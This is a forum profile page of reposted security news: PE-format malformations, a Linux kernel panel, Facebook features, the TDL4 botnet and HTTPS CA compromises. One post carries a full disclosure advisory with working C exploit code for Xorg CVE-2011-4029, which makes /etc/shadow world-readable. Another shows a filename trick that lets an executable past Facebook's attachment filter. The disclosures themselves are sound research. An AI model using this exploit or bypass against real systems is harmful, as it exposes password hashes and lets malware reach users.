Jump to content

Nytro

Administrators
  • Posts

    18725
  • Joined

  • Last visited

  • Days Won

    706

Everything posted by Nytro

  1. Undocumented PECOFF CONSTANT INSECURITY: THINGS YOU DIDN'T KNOW ABOUT (PE) PORTABLE EXECUTABLE FILE FORMAT One constant challenge of modern security will always be the difference between published and implemented specifications. Evolving projects, by their very nature, open up a host of exploit areas and implementation ambiguities that cannot be fixed. As such, complex documentation such as that for PECOFF or PDF are goldmines of possibilities. In this talk we will disclose our recent findings about never before seen PE or Portable executable format malformations. These findings have serious consequences on security and reverse engineering tools and lead to multiple exploit vectors. PE is the main executable image file format on Windows operating system since its introduction in Windows NT 18 years ago. PE file format itself can be found on numerous Windows-based devices including PCs, mobile and gaming devices, BIOS environments and others. Its proper understanding is the key for securing these platforms. The talk will focus on all aspects of PE file format parsing that leads to undesired behavior or prevents security and reverse engineering tools from inspecting malformated files due to incorrect parsing. Special attention will be given to differences between PECOFF documentation and the actual implementation done by the operating system loader. With respect to these differences we will demonstrate existence of files that can't possibly be considered valid from a documentation standpoint but which are still correctly processed and loaded by the operating system. These differences and numerous design logic flaws can lead to PE processing errors that have serious and hardly detectable security implications. Effects of these PE file format malformations will be compared against several reverse engineering tools, security applications and unpacking systems. Special attention will be given to following PE file format aspects and their malformation consequences: General PE header layout in respect to data positioning and consequences of different memory model implementations as specified by PECOFF documentation. Use of multiple PE headers in a single file along with self-destructing headers. Alignment fields with their impact on disk and memory layout with the section layout issues that can occur due to disk or memory data overlapping or splicing. In addition to this, section table content will be inspected for issues of data hiding and its limits will be tested for upper and lower content boundaries. We will demonstrate how such issues affect existing static and dynamic PE unpacking systems. Data tables, including imports and exports, will be discussed in detail to show how their malformated content can break analysis tools but is still considered valid from the operating system loader standpoint. We will demonstrate existence of files that can miss use existing PE features in order to cloak important file information and omit reverse engineering process. Furthermore based upon these methods a unique undetectable method of API hooking that requires no code for hooks insertion will be presented. PE file format will be inspected for integer overflows and we will show how their presence can lead to arbitrary code execution in otherwise safe analysis environments. We will show how PE fields themselves could be used to deliver code payload resulting in a completely new field of programming; via the file format itself. In addition to single field and table malformations more complex ones involving multiple fields and tables will also be discussed. As a demonstration of such use case scenario a unique malformation requiring multiple fields working together to establish custom file encryption will be presented. This simple, yet effective, encryption that is reversed during runtime by the operating system loader itself requires no code in the malformated binary itself to be executed. Its effectiveness is in a unique approach to encryption trough file format features themselves in order to prevent static and dynamic file analysis tools from processing such files. This talk will be a Black Hat exclusive; Whitepaper accompanying the presentation materials will contain detailed description of all malformations discussed during the talk. This whitepaper aims to be a mandatory reading material for security analysts. It will continue to be maintained as new information on PE format malformations are discovered. Slides: http://www.reversinglabs.com/blackhat/PECOFF_BlackHat-USA-11-Slides.pdf Download whitepaper: http://www.reversinglabs.com/blackhat/PECOFF_BlackHat-USA-11-Whitepaper.pdf Sursa: ReversingLabs vulnerability advisory | www.reversinglabs.com | Reverse Engineering & Software Protection
  2. Nytro

    Nelamurire

    E bine ca ai postat aici. In primul rand, nu vad ce motive ar avea cineva sa ajunga VIP. In momentul de fata, VIPii sunt membri mai vechi ai forumului, oameni pe care ii cunoastem si stim de ce sunt in stare, persoane care au contribuit foarte mult. Daca sunt VIPi fara foarte multe poturi, sunt niste oameni care si-au demonstrat calitatile prin diverse actiuni, ne-au demonstrat ca sunt "speciali" si acesta e un mod simplu de a-i recompensa. Practic prin VIP strangem membri de care suntem multumiti. Bine, trebuie facuta putina ordine pe acolo, vreau sa mai dau vreo 2-3 VIP-uri, dar nu prea am avut timp sa urmaresc forumul. Avantaje nu ar fi extrem de multe, nu avem loguri sau astfel de prostii in categoria speciala, dar membri VIP au un cuvant de spus in legatura cu schimbarile de aici. In rest, dat fiind faptul ca ne cunoastem, ne putem ajuta intre noi si fara sa postam la categoria speciala, cand unul are nevoie de ceva, se gaseste sigur cineva care sa il ajute si tot asa. Pentru a deveni VIP trebuie sa postezi practic. Nu conteaza ce, depinde de tine. In functie de ce postezi ne dam seama de cunosntintele dar si de modul de a gandi, si astfel se primeste acest statut. Si daca tot veni vorba, dai si tu o sticla de whisky si altfel discutam.
  3. Hackers wanted Hackers are people too Documentar de la Discovery despre Hacking Lasa rahaturile ca Hackers 95 in care 2 ratati apasa in disperare pe tastatura si trec de firewalluri si mai stiu eu ce penibilitati...
  4. Nici eu nu sunt de acord cu furtul informational (da, sigur, parole de Filelist, al dracu de interesant) dar e aiurea ce a postat acolo. Eh, e si aceea o reclama, o sa ne trezim cu fani ai furturilor de conturi.
  5. Iti iei o carte de gramatica si o carte de literatura in limba engleza pe care o citesti cu dictionarul langa tine. Apoi treci la partea de "listening" si vorbire, trebuie sa ai o persoana care stie engleza, care stie sa pronunte cum trebuie... Poti sa te uiti si la filme in engleza fara subtitrare.
  6. The Kernel Panel at LinuxCon Europe Wednesday, 26 October 2011 14:31 Nathan Willis Linux users got a rare opportunity to hear directly from the hackers at the core of the Linux kernel on Wednesday at LinuxCon Europe. Read on for more on the state of ARM in the Linux kernel, the need for new kernel contributors, and the death of the Big Kernel Lock (BKL). Linus Torvalds and other kernel developers sat down for a question and answer session at the first LinuxCon Europe. Lennart Poettering, creator of PulseAudio and systemd, served as moderator for the panel, which consisted of Torvalds, Alan Cox, Thomas Gleixner, and Paul McKenney. The four took prepared questions from Poettering, as well as responding to impromptu audience member questions on every topic from version numbers to the future of the kernel project itself. The panelists introduced themselves first. Torvalds, of course, is the leader of the project. Cox works primarily in system-on-chip these days (although he has had other roles in the past). Gleixner maintains the real-time patches. McKenney works on the read-copy-update (RCU) mechanism. Together they account for just a tiny fraction of the kernel community, but by their roles and experience offer keen insights into the health of the kernel, the health of the kernel community, and the directions it is heading. Poettering opened by asking the group about a frequently-quoted comment by Torvalds that breaking userspace compatibility was something that had to be avoided at all costs. A nice sentiment, Poettering said, but one that sounds hypocritical considering how often the kernel team really does break compatibility with its releases — sometimes even with trivial changes like the switch from 2.6.x version numbers to 3.0 that happened earlier this year. Torvalds pointed out that any program which assumed that the kernel's version number would always start with a "2" was broken already, but that the kernel team had also added a "compatibility" mode that would report its version number as 2.6.40 if buggy programs needed it. That encapsulated the kernel team's approach: add something new, but do everything possible to make sure that the old way of doing things continued to work. Torvalds added that he used to keep ancient binaries around — including the very first shells written for Linux, which used APIs that were deprecated within months — to test against each new kernel release, just to make sure that old code continued to run. API stability is important, he said, but it flows out of not breaking the user experience. "No project is more important than the users of that project," he summarized. Next, Poettering asked if there was an aging problem with the core kernel development team, noting that the average age of the subsystem maintainers was growing. Torvalds said no, but that it sometimes seemed like it simply because it takes time for a new contributor to "graduate" from maintaining a single driver to managing a set, and eventually to managing an entire subsystem. The others agreed; Cox added that there was plenty of "fresh blood" in the project, in fact more than enough, but there was a bigger problem in the gender gap — a problem that no one seemed able to fix, despite years of trying. Most of the female kernel contributors today work for commercial vendors, he said; with very few participating because of their own hobbyist interest. Torvalds added that another reason it often seems like the kernel crowd is aging rapidly is how ridiculously young they were when they started — he was only 20 himself, and several other key contributors were still teenagers. Audience members asked questions from microphones placed at the edge of the stage, and several had questions about specific features: the Big Kernel Lock (BKL), the complexity of the ARM tree, and whether or not embedded Linux developers were given as much attention as developers working on desktop and server platforms. Cox reminisced about the BKL, which he called the right solution for the early days of multi-processor support in Linux, even though it had subsequently taken years to replace with more sophisticated methods. It was always a nuisance, he said, but it got Linux SMP support much faster than other OSes, such as the BSDs. The ARM architecture was controversial in recent months, after Torvalds had to resort to tough talk to get the ARM family to clean up its code and standardize more. The situation is much better today, Torvalds reported. The problem, he said, is that while ARM has a standardized instruction set for the processor, every ARM board has a different approach to other important things like timers and interrupts. Intel had never faced such a glut of incompatible standards for the x86 architecture because the PC platform was so uniform, so it has taken a while for ARM to see the need to take a more active approach towards standardization. Torvalds also said that for the most part the kernel team is very interested in embedded development; what gets tricky is that most embedded Linux devices are designed to be built once and never upgraded. That makes it harder to do testing and ongoing kernel support for embedded platforms. When asked about the challenges facing the Linux kernel over the next few years, McKenney cited a number of research topics facing all operating systems: scalability, real-time, and validation, to name a few. Torvalds said maintaining the right balance between complexity and the ability to get things done. The sheer amount of new hardware that comes out every year is overwhelming, he said; keeping up with it is a practical (though not theoretical) challenge for the team. Speaking of the practical, one audience member asked Torvalds what his process was when getting a new pull request from a contributor. "I manage by trusting people," he replied. Whenever a pull request comes in, he looks at the person who sent it. Depending on the person, his process varies: some people have earned enough trust over the years that he believes in their judgment, while others have their own recurring issues that mandate additional review. In any case, he said, he makes sure that the new code compiles on his own machine because he "hates it" when he can't compile for his own configuration. But for the most part, he said, his role is no longer to validate individual pieces of code, but to orchestrate the work of others. If he knows two people are working in a similar part of the kernel, he needs to be aware of it to avert clashes, but he trusts the maintainers of their individual subsections. That trust is given to the person, he reiterated; the individual earns it, not the company that the individual might work for. The panel touched on other areas as well, including security, cgroups, and subsystem bloat. In each case, was comes across in a panel discussion such as this is how human the process of writing and maintaining the kernel is. The kernel team can make mistakes, and they have to route around them with bugfixes in subsequent releases. Maintainers may not be interested in a particular area of development, but they will look at and even integrate the patches because they are important to a subset of developers or kernel users. The kernel may have steep technical challenges, but just as real a threat to productivity is burnout among maintainers. It is fun to watch the kernel team wisecrack and comment on stage, but it is also a healthy reminder that above all else, Linux is a collaborative project, not simply lines of code. Sursa: http://www.linux.com/learn/tutorials/499287:the-kernel-panel-at-linuxcon-europe
  7. Facebook Tests Security Features By Antone Gonsalves, CRN October 27, 2011 7:42 PM ET Facebook is testing security features that boost password protection for third-party applications and make it easier to reactivate accounts hijacked by hackers. Facebook unveiled App Passwords and Trusted Friends Wednesday, saying they would be testing the features over the “coming weeks.” The announcement is the latest effort by Facebook to improve safety on the site, which is a favorite target of cyber-criminals looking to dupe the social network’s 800 million users worldwide. Trusted Friends is like giving a bosom buddy the key to your house in case you get locked out. A user selects three to five friends that Facebook will send a secret code to pass along, if the account holder can’t get into the site. This sometimes happens when a hacker hijacks someone’s Facebook account and changes the password. App Passwords provides a higher level of security for logging in to third-party applications. A growing number of Web applications allow people to log in using their Facebook credentials. As an alternative, a unique password can be generated by going to Account Settings, then the Security tab and finally to the App Passwords section. Entering an e-mail address and the Facebook-generated password should get a person into the app. The password doesn’t have to be remembered, because Facebook can generate it anytime. Facebook announced the features the same day a security researcher reported a flaw that makes it possible to send a message on Facebook with an executable file attached. Such malware is often sent by cyber-criminals attempting to secretly gain control of people’s PCs. Nathan Power, director of a professional group called the Ohio Information Security Forum, discovered the workaround for Facebook’s security mechanism that prevents sending executables. Power reported the vulnerability to Facebook September 30, and said the vendor acknowledged the flaw Wednesday. Sursa: http://www.crn.com/news/security/231901834/facebook-tests-security-features.htm
  8. TDL4 botnet may be available for rent 27 October 2011 ESET's senior research fellow David Harley says that, while his team of researchers have been tracking the TDL4 botnet for some time, they have noticed a new phase in its evolution. These changes, he noted, may signal that either the team developing the malware has changed or that the developers have started selling a bootkit builder to other cybercriminal groups on a rental basis. The dropper for the botnet, he asserted, sends copious tracing information to the command-and-control server during the installation of the rootkit onto the system. In the event of any error, he said, it sends a comprehensive error message that gives the malware developers enough information to determine the cause of the fault. All of this, wrote Harley in his latest security posting, suggests that this bot is still under development. “We also found a form of countermeasure against bot trackers based on virtual machines: during the installation of the malware it checks on whether the dropper is being run in a virtual machine environment and this information is sent to the command-and-control server. Of course, malware that checks on whether it is running in a virtual environment is far from unusual in modern malware, but in this form it's kind of novel for TDL”, he said. On of the most interesting evolutions of the botnet, Infosecurity notes, is that the layout of the hidden file system has been changed also. In contrast to the previous version, which Harley said is capable of storing at most 15 files – regardless of the size of reserved space – the capacity of the new file system is limited by the length of the malicious partition. The file system presented by the latest modification of the malware is more advanced than previously, noted Harley, adding that, as an example, the malware is able to detect corruption of the files stored in the hidden file system by calculating its CRC32 checksum and comparing it with the value stored in the file header. In the event that a file is corrupted it is removed from the file system. Over at Avecto, Mark Austin, the Windows privilege management specialist, said that the removal of admin rights can add an extra layer of defence in the ongoing battle against the malware coders. “TDL-4 is a damaging piece of code that takes the competitor-removing aspects of darkware we saw with SpyEye – and its ability to detect and delete Zeus – and adds all manner of evasive technologies that make conventional pattern/heuristic analyses a lot more difficult”, he explained. The removal of admin rights, he went on to say, is a powerful option as part of a multi-layered IT security strategy in the constant battle against darkware in all its shapes and forms. “Even if you are unfortunate to find one or more user accounts have been compromised by a phishing attack, for example, the fact that the account(s) are limited in what they can do helps to reduce the effects of the security problem”, he added. Malware like this, said Austin, is almost certain to evolve, with cybercriminals repurposing elements of what is essentially a modular suite of malware, adding enhancements to certain features, deleting older code, and adding new elements to take advantage of newly-discovered attack vectors. “It isn't rocket science that will defeat new evolutions of existing malware – or for that matter completely new darkware code. What is needed is a carefully planned strategy, with well thought out implementations that use multiple elements of security which, when combined, are greater than the sum of their components”, he said. “Privileged account management can greatly assist IT professionals in this regard, as it adds an extra string to their defensive bow. This is all part of the GRC – governance, risk management and compliance – balancing act that is modern IT security management”, he added. Sursa: http://www.infosecurity-magazine.com/view/21651/tdl4-botnet-may-be-available-for-rent/
  9. Google Denies Requests To Remove Videos of Police Brutality By Jon Mitchell / October 27, 2011 4:45 PM In a show of good faith today, Google touted the fact that it has refused to cooperate with local law enforcement agencies in the U.S. who requested the removal of YouTube videos of police brutality and criticisms of law enforcement officials. Google cited its transparency report from the first half of this year, but to mention it today is telling. With violent crackdowns at Occupy Oakland this week, citizen media like YouTube have been a vital channel. From Google's mid-year transparency report: "We received a request from a local law enforcement agency to remove YouTube videos of police brutality, which we did not remove. Separately, we received requests from a different local law enforcement agency for removal of videos allegedly defaming law enforcement officials. We did not comply with those requests, which we have categorized in this Report as defamation requests." http://www.youtube.com/watch?feature=player_embedded&v=uRfjX7vHxM4 "The whole world is watching," as protesters around the country have reminded officials since they first began to occupy Wall Street. With this week's escalations, now would not be a good time for Google to engage in censorship. The wording of its notice about denying the removal requests is encouraging, but it's carefully chosen to suit a particular situation. Google complies with 93% of U.S. removal requests. It has decided that the best course of action is to maintain transparency and respond on a case-by-case basis. That transparency has upset governments, and the refusal to censor police brutality videos surely made some city officials unhappy. But Google's record is spotty. Just this month, it handed over a WikiLeaks volunteer's Gmail data to the U.S. government, which used an old and controversial law to request it without a warrant from a judge. Google is pushing for updated laws that better reflect the media of today, but in the meantime, its record on upholding free speech is touch-and-go. Google has done the right thing with these police takedown requests, but the world should keep watching. What do you think Google's responsibilities are regarding government requests? Sursa: Google Denies Requests To Remove Videos of Police Brutality [uPDATED]
  10. Xorg permission change vulnerability From: vladz <vladz () devzero fr> Introduction ------------ I've found a file permission change vulnerability in the way that Xorg creates its temporary lock file "/tmp/.tXn-lock" (where 'n' is the X display). When exploited, this vulnerability allows a non-root user to set the read permission for all users on any file or directory. For the exploit to succeed the local attacker needs to be able to run the X.Org X11 X server. NOTE: At this time (26/10/2010), some distros are still vulnerable (see "Fix & Patch" above for more informations). Hi list, A couple of weeks ago, I found a permission change vulnerability in the way that Xorg handled its lock files. Once exploited, it allowed a local user to modify the file permissions of an arbitrary file to 444 (read for all). It has been assigned CVE-2011-4029, X.org released a patch on 2011/10/18, and now, I though I could share the vulnerability description and its original PoC. POC: http://vladz.devzero.fr/Xorg-CVE-2011-4029.txt Author: vladz <vladz@devzero.fr> (new on twitter @v14dz!) Description: Xorg permission change vulnerability (CVE-2011-4029) Product: X.Org (http://www.x.org/releases/) Affected: Xorg 1.4 to 1.11.2 in all configurations. Xorg 1.3 and earlier if built with the USE_CHMOD preprocessor identifier PoC tested on: Debian 6.0.2 up to date with X default configuration issued from the xserver-xorg-core package (version 2:1.7.7-13) Follow-up: 2011/10/07 - X.org foundation informed 2011/10/09 - Distros informed 2011/10/18 - Issue/patch publicly announced Introduction ------------ I've found a file permission change vulnerability in the way that Xorg creates its temporary lock file "/tmp/.tXn-lock" (where 'n' is the X display). When exploited, this vulnerability allows a non-root user to set the read permission for all users on any file or directory. For the exploit to succeed the local attacker needs to be able to run the X.Org X11 X server. NOTE: At this time (26/10/2010), some distros are still vulnerable (see "Fix & Patch" above for more informations). Description ----------- Once started, Xorg attempts to create a lock file "/tmp/.Xn-lock" in a secure manner: it creates/opens a temporary lock file "/tmp/.tXn-lock" with the O_EXCL flag, writes the current PID into it, links it to the final "/tmp/.Xn-lock" and unlink "/tmp/.tXn-lock". Here is the code: $ cat -n os/utils.c [...] 288 /* 289 * Create a temporary file containing our PID. Attempt three times 290 * to create the file. 291 */ 292 StillLocking = TRUE; 293 i = 0; 294 do { 295 i++; 296 lfd = open(tmp, O_CREAT | O_EXCL | O_WRONLY, 0644); 297 if (lfd < 0) 298 sleep(2); 299 else 300 break; 301 } while (i < 3); 302 if (lfd < 0) { 303 unlink(tmp); 304 i = 0; 305 do { 306 i++; 307 lfd = open(tmp, O_CREAT | O_EXCL | O_WRONLY, 0644); 308 if (lfd < 0) 309 sleep(2); 310 else 311 break; 312 } while (i < 3); 313 } 314 if (lfd < 0) 315 FatalError("Could not create lock file in %s\n", tmp); 316 (void) sprintf(pid_str, "%10ld\n", (long)getpid()); 317 (void) write(lfd, pid_str, 11); 318 (void) chmod(tmp, 0444); 319 (void) close(lfd); 320 [...] 328 haslock = (link(tmp,LockFile) == 0); 329 if (haslock) { 330 /* 331 * We're done. 332 */ 333 break; 334 } 335 else { 336 /* 337 * Read the pid from the existing file 338 */ 339 lfd = open(LockFile, O_RDONLY); 340 if (lfd < 0) { 341 unlink(tmp); 342 FatalError("Can't read lock file %s\n", LockFile); 343 } [...] As a reminder, chmod() operates on filenames rather than on file handles. So in this case, at line 318, there is no guarantee that the file "/tmp/.tXn-lock" still refers to the same file on disk that it did when it was opened via the open() call. See TOCTOU vulnerability explained on OWASP[1] for more informations. The idea here is to remove and replace (by a malicious symbolic link), the "tmp" file ("/tmp/.tXn-lock") between the call to open() at line 296 and the call to chmod() at line 318. But for a non-root user, removing this file looks impossible as it is located in a sticky bit directory ("/tmp") and owned by root. But, what if we launch two Xorg processes with an initial offset (few milliseconds) so that the first process unlink() (line 341) the "tmp" file right before the second process calls chmod()? This race condition would consists in placing unlink() between open() and chmod(). It sounds very difficult because there is only one system call between them (and maybe not enough time to perform unlink() and create our symbolic link): # strace X :1 [...] open("/tmp/.tX1-lock", O_WRONLY|O_CREAT|O_EXCL, 0644) = 0 write(0, " 2192\n", 11) = 11 chmod("/tmp/.tX1-lock", 0444) = 0 Anyway, we can make this possible by sending signals SIGCONT and SIGSTOP[2] to our process. As they are not trapped by the program, they will allow us to control and regulate (by stopping and resuming) the execution flow. Here is how to proceed: 1) launch the X wrapper (pid=n) 2) stop it (by sending SIGSTOP to 'n') rigth after "/tmp/.tX1-lock" is created (this actually means that the next instruction is chmod()) 3) launch another X process to unlink() /tmp/.tX1-lock 4) create the symbolic link "/tmp/.tX1-lock" -> "/etc/shadow" 5) send SIGCONT to 'n' to perform chmod() on our link The minor problem is that when launching X several times (for race purpose), it makes the console switch between X and TTY, and in some cases, it freezes the screen and disturbs the attack. The solution is to make X exit before it switches by creating a link "/tmp/.Xn-lock" (real lock filename) to a file that doesn't exist. This will make the open() call fails at line 339, and quit with FatalError() at 342. So before our 5 steps, we just need to add: 0) create the symbolic link "/tmp/.X1-lock" -> "/dontexist" Proof Of Concept ---------------- /* xchmod.c -- Xorg file permission change vulnerability PoC This PoC sets the rights 444 (read for all) on any file specified as argument (default file is "/etc/shadow"). Another good use for an attacker would be to dump an entire partition in order to disclose its full content later (via a "mount -o loop"). Made for EDUCATIONAL PURPOSES ONLY! CVE-2011-4029 has been assigned. In some configurations, this exploit must be launched from a TTY (switch by typing Ctrl-Alt-Fn). Tested on Debian 6.0.2 up to date with X default configuration issued from the xserver-xorg-core package (version 2:1.7.7-13). Compile: cc xchmod.c -o xchmod Usage: ./xchmod [/path/to/file] (default file is /etc/shadow) $ ls -l /etc/shadow -rw-r----- 1 root shadow 1072 Aug 7 07:10 /etc/shadow $ ./xchmod [+] Trying to stop a Xorg process right before chmod() [+] Process ID 4134 stopped (SIGSTOP sent) [+] Removing /tmp/.tX1-lock by launching another Xorg process [+] Creating evil symlink (/tmp/.tX1-lock -> /etc/shadow) [+] Process ID 4134 resumed (SIGCONT sent) [+] Attack succeeded, ls -l /etc/shadow: -r--r--r-- 1 root shadow 1072 Aug 7 07:10 /etc/shadow ----------------------------------------------------------------------- "THE BEER-WARE LICENSE" (Revision 42): <vladz@devzero.fr> wrote this file. As long as you retain this notice you can do whatever you want with this stuff. If we meet some day, and you think this stuff is worth it, you can buy me a beer in return. -V. */ #include <sys/types.h> #include <sys/stat.h> #include <fcntl.h> #include <unistd.h> #include <stdio.h> #include <syscall.h> #include <signal.h> #include <string.h> #include <stdlib.h> #define XORG_BIN "/usr/bin/X" #define DISPLAY ":1" char *get_tty_number(void) { char tty_name[128], *ptr; memset(tty_name, '\0', sizeof(tty_name)); readlink("/proc/self/fd/0", tty_name, sizeof(tty_name)); if ((ptr = strstr(tty_name, "tty"))) return ptr + 3; return NULL; } int launch_xorg_instance(void) { int child_pid; char *opt[] = { XORG_BIN, DISPLAY, NULL }; if ((child_pid = fork()) == 0) { close(1); close(2); execve(XORG_BIN, opt, NULL); _exit(0); } return child_pid; } void show_target_file(char *file) { char cmd[128]; memset(cmd, '\0', sizeof(cmd)); sprintf(cmd, "/bin/ls -l %s", file); system(cmd); } int main(int argc, char **argv) { pid_t proc; struct stat st; int n, ret, current_attempt = 800; char target_file[128], lockfiletmp[20], lockfile[20], *ttyno; if (argc < 2) strcpy(target_file, "/etc/shadow"); else strcpy(target_file, argv[1]); sprintf(lockfile, "/tmp/.X%s-lock", DISPLAY+1); sprintf(lockfiletmp, "/tmp/.tX%s-lock", DISPLAY+1); /* we must ensure that Xorg is not already running on this display */ if (stat(lockfile, &st) == 0) { printf("[-] %s exists, maybe Xorg is already running on this" " display? Choose another display by editing the DISPLAY" " attributes.\n", lockfile); return 1; } /* this avoid execution to continue (and automatically switch to another * TTY). Xorg quits with fatal error because the file that /tmp/.X?-lock * links does not exist. */ symlink("/dontexist", lockfile); /* we have to force this mask to not comprise our later checks */ umask(077); ttyno = get_tty_number(); printf("[+] Trying to stop a Xorg process right before chmod()\n"); while (--current_attempt) { proc = launch_xorg_instance(); n = 0; while (n++ < 10000) if ((ret = syscall(SYS_stat, lockfiletmp, &st)) == 0) break; if (ret == 0) { syscall(SYS_kill, proc, SIGSTOP); printf("[+] Process ID %d stopped (SIGSTOP sent)\n", proc); stat(lockfiletmp, &st); if ((st.st_mode & 4) == 0) break; printf("[-] %s file has wrong rights (%o)\n" "[+] removing it by launching another Xorg process\n", lockfiletmp, st.st_mode); launch_xorg_instance(); sleep(7); } kill(proc, SIGKILL); } if (current_attempt == 0) { printf("[-] Attack failed.\n"); if (!ttyno) printf("Try with console ownership: switch to a TTY* by using " "Ctrl-Alt-F[1-6] and try again.\n"); return 1; } printf("[+] Removing %s by launching another Xorg process\n", lockfiletmp); launch_xorg_instance(); sleep(7); if (stat(lockfiletmp, &st) == 0) { printf("[-] %s lock file still here... \n", lockfiletmp); return 1; } printf("[+] Creating evil symlink (%s -> %s)\n", lockfiletmp, target_file); symlink(target_file, lockfiletmp); printf("[+] Process ID %d resumed (SIGCONT sent)\n", proc); kill(proc, SIGCONT); /* wait for chmod() to finish */ usleep(300000); stat(target_file, &st); if (!(st.st_mode & 004)) { printf("[-] Attack failed, rights are %o. Try again!\n", st.st_mode); return 1; } /* cleaning temporary link */ unlink(lockfile); printf("[+] Attack succeeded, ls -l %s:\n", target_file); show_target_file(target_file); return 0; } Fix & Patch ------------ A fix for this vulnerability is available and will be included in xserver 1.11.2 and xserver 1.12. http://cgit.freedesktop.org/xorg/xserver/commit/?id=b67581cf825940fdf52bf2e0af4330e695d724a4 Some distros released new Xorg packages (Ubuntu, Gentoo) since others (like Debian) judge this as a non-critical issue: http://security-tracker.debian.org/tracker/CVE-2011-4029 Footnotes & links ----------------- [1] https://www.owasp.org/index.php/File_Access_Race_Condition:_TOCTOU [2] http://en.wikipedia.org/wiki/SIGCONT "SIGCONT is the signal sent to restart a process previously paused by the SIGSTOP signal". Sursa: Full Disclosure: Xorg file permission change PoC (CVE-2011-4029) PS: "At this time (26/10/2010)" cred ca vrea sa fie 2011.
  11. Facebook Attach EXE Vulnerability OCTOBER 27, 2011 ---------------------------------------------------------------------------------------------------------------------------------------- 1. Summary: When using the Facebook 'Messages' tab, there is a feature to attach a file. Using this feature normally, the site won't allow a user to attach an executable file. A bug was discovered to subvert this security mechanisms. Note, you do NOT have to be friends with the user to send them a message with an attachment. ---------------------------------------------------------------------------------------------------------------------------------------- 2. Description: When attaching an executable file, Facebook will return an error message stating: "Error Uploading: You cannot attach files of that type." When uploading a file attachment to Facebook we captured the web browsers POST request being sent to the web server. Inside this POST request reads the line: Content-Disposition: form-data; name="attachment"; filename="cmd.exe" It was discovered the variable 'filename' was being parsed to determine if the file type is allowed or not. To subvert the security mechanisms to allow an .exe file type, we modified the POST request by appending a space to our filename variable like so: filename="cmd.exe " This was enough to trick the parser and allow our executable file to be attached and sent in a message. --------------------------------------------------------------------------------------------------------------------------------------- 3. Impact: Potentially allow an attacker to compromise a victim’s computer system. ---------------------------------------------------------------------------------------------------------------------------------------- 4. Affected Products: www.facebook.com ---------------------------------------------------------------------------------------------------------------------------------------- 5. Time Table: 09/30/2011 Reported Vulnerability to the Vendor 10/26/2011 Vendor Acknowledged Vulnerability 10/27/2011 Publicly Disclosed ---------------------------------------------------------------------------------------------------------------------------------------- 6. Credits: Discovered by Nathan Power www.securitypentest.com ---------------------------------------------------------------------------------------------------------------------------------------- Sursa: http://www.securitypentest.com/2011/10/facebook-attach-exe-vulnerability.html
  12. How secure is HTTPS today? How often is it attacked? OCTOBER 25, 2011 - 12:55PM | BY PETER ECKERSLEY This is part 1 of a series on the security of HTTPS and TLS/SSL HTTPS is a lot more secure than HTTP! If a site uses accounts, or publishes material that people might prefer to read in private, the site should be protected with HTTPS. Unfortunately, is still feasible for some attackers to break HTTPS. Leaving aside cryptographic protocol vulnerabilities, there are structural ways for its authentication mechanism to be fooled for any domain, including mail.google.com, www.citibank.com, www.eff.org, addons.mozilla.org, or any other incredibly sensitive service: Break into any Certificate Authority (or compromise the web applications that feed into it). As we learned from the SSL Observatory project, there are 600+ Certificate Authorities that your browser will trust; the attacker only needs to find one of those 600 that she is capable of breaking into. This has been happening with catastrophic results. Compromise a router near any Certificate Authority, so that you can read the CA's outgoing email or alter incoming DNS packets, breaking domain validation. Or similarly, compromise a router near the victim site to read incoming email or outgoing DNS responses. Note that SMTPS email encryption does not help because STARTTLS is vulnerable to downgrade attacks. Compromise a recursive DNS server that is used by a Certificate Authority, or forge a DNS entry for a victim domain (which has sometimes been quite easy). Again, this defeats domain validation. Attack some other network protocol, such as TCP or BGP, in a way that grants access to emails to the victim domain. A government could order a Certificate Authority to produce a malicious certificate for any domain. There is circumstantial evidence that this may happen. And because CAs are located in 52+ countries, there are lots of governments that can do this, including some deeply authoritarian ones. Also, governments could easily perform any of the above network attacks against CAs in other countries. In short: there are a lot of ways to break HTTPS/TLS/SSL today, even when websites do everything right. As currently implemented, the Web's security protocols may be good enough to protect against attackers with limited time and motivation, but they are inadequate for a world in which geopolitical and business contests are increasingly being played out through attacks against the security of computer systems. How often are these attacks occurring? [update 10/27/2011: there was an error in our manual de-duplication of CA organizations. Rather than 15 total compromised organizations and 5 since June, the CRLs indicate 14 total and 4 since June] At USENIX Security this year, Jesse Burns and I reported a number of findings that came from studying all of the Certificate Revocation Lists (CRLs) that are published by CAs seen by the SSL Observatory. One interesting feature of X.509 Certificate Revocation Lists is that they contain fields explaining the reason for revocations. As of last week, a scan of all the CRLs seen previously by the Observatory showed the following tallies: +------------------------+------------+ | reason | occurences | +------------------------+------------+ | NULL | 921683 | | Affiliation Changed | 41438 | | CA Compromise | 248 | | Certificate Hold | 80371 | | Cessation Of Operation | 690905 | | Key Compromise | 73345 | | Privilege Withdrawn | 4622 | | Superseded | 81021 | | Unspecified | 168993 | +------------------------+------------+ The most interesting entry in that table is the "CA compromise" one, because those are incidents that could affect any or every secure web or email server on the Internet. In at least 248 cases, a CA chose to indicate that it had been compromised as a reason for revoking a cert. Such statements have been issued by 14 distinct CA organizations. A previous scan, conducted in June this year, showed different numbers: +------------------------+------------+ | reason | occurences | +------------------------+------------+ | NULL | 876049 | | Affiliation Changed | 27089 | | CA Compromise | 55 | | Certificate Hold | 52786 | | Cessation Of Operation | 700770 | | Key Compromise | 59527 | | Privilege Withdrawn | 4589 | | Superseded | 66415 | | Unspecified | 174444 | +------------------------+------------+ Those "CA Compromise" CRL entries as of June were published by 10 distinct CAs. So, from this data, we can observe that at least 4 CAs have experienced or discovered compromise incidents in the past four months. Again, each of these incidents could have broken the security of any HTTPS website. It is also interesting to examine revocations by reason as a function of time: Generally, this plot reflects enormous growth in HTTPS/TLS deployment, as well as the growing strain that its being placed on its authentication mechanisms. The problems with the CA system and TLS authentication are urgent and structural, but they can be fixed. In this series of posts, we will set out an EFF proposal for reinforcing the CA system, which would allow security-critical websites and email systems to protect themselves from being compromised via an attack on any CA in the world. Sursa: https://www.eff.org/deeplinks/2011/10/how-secure-https-today
